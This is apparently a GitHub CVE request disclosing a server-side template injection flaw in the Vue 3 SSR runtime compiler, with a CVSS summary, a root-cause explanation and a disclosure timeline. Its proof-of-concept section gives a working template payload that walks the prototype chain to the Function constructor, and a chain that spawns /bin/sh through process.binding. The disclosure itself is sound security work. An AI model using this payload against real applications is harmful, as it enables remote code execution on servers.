CVE Request: Remote Code Execution in Vue.js 3.x SSR Runtime Compiler (GHSA-pw74-q32p-x99f) #7299
Description
CVE Request — Vendor Unresponsive
I am requesting GitHub CNA to assign a CVE ID for a critical vulnerability in Vue.js that the vendor has not responded to after 10 days.
Existing Advisory
- GHSA: GHSA-pw74-q32p-x99f (submitted 2026-03-29, still in triage)
- MITRE: Ticket #2014701 (submitted 2026-03-25) + CVE Form Ticket #2019581 (submitted 2026-04-03)
- Vendor: security@vuejs.org — notified 2026-03-25, final notice 2026-03-31, zero response
Vulnerability Summary
| Field | Value |
|---|---|
| Product | Vue.js (vuejs/core) — @vue/server-renderer, @vue/compiler-ssr, @vue/compiler-core |
| Versions | All Vue 3.x through 3.5.30 (latest) |
| CWE | CWE-94 (Improper Control of Generation of Code) |
| CVSS | 10.0 Critical (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H) |
| Type | Server-Side Template Injection → Remote Code Execution |
Root Cause
Vue 3's SSR runtime template compiler (ssrCompile.ts) executes compiled templates via Function('require', code)(require) without sandboxing. The prefixIdentifiers transform rewrites Identifier AST nodes but not ThisExpression nodes, allowing this.__proto__.constructor.constructor(...)() to achieve arbitrary code execution in Node.js.
Proof of Concept
import { createSSRApp } from 'vue'
import { renderToString } from 'vue/server-renderer'
const userInput = "{{ this.__proto__.constructor.constructor('return process.version')() }}"
const app = createSSRApp({ template: `<div>${userInput}</div>` })
const html = await renderToString(app)
console.log(html) // <div>v22.22.1</div> — full RCE confirmedFull RCE chain: this.__proto__.constructor.constructor("var s=process.binding('spawn_sync');var r=s.spawn({file:'/bin/sh',args:['sh','-c','id'],...});return Buffer.from(r.output[1]).toString()")()
Prior Art
- CVE-2019-19919 (Handlebars.js): Identical exploit vector — prototype chain traversal to Function constructor in a template engine. Was assigned CVE.
- CVE-2018-6341 (Vue 2 SSR): Related Vue 2 XSS vulnerability in SSR, was assigned CVE.
Impact
Any Vue 3 SSR application that compiles templates at runtime with user-controlled content is vulnerable to Remote Code Execution. This includes CMS platforms, low-code builders, and multi-tenant SaaS applications.
Disclosure Timeline
| Date | Action |
|---|---|
| 2026-03-25 | Reported to security@vuejs.org |
| 2026-03-25 | MITRE ticket #2014701 submitted |
| 2026-03-29 | GitHub PVR GHSA-pw74-q32p-x99f submitted |
| 2026-03-31 | Final notice sent to security@vuejs.org |
| 2026-04-03 | MITRE CVE Form submitted (Ticket #2019581) |
| 2026-04-04 | This GitHub CNA request |
| 2026-06-23 | 90-day public disclosure deadline |
Request
Please assign a CVE ID for this vulnerability. The vendor (Vue.js / Evan You) has been completely unresponsive for 10 days across multiple channels (direct email, GitHub PVR, MITRE).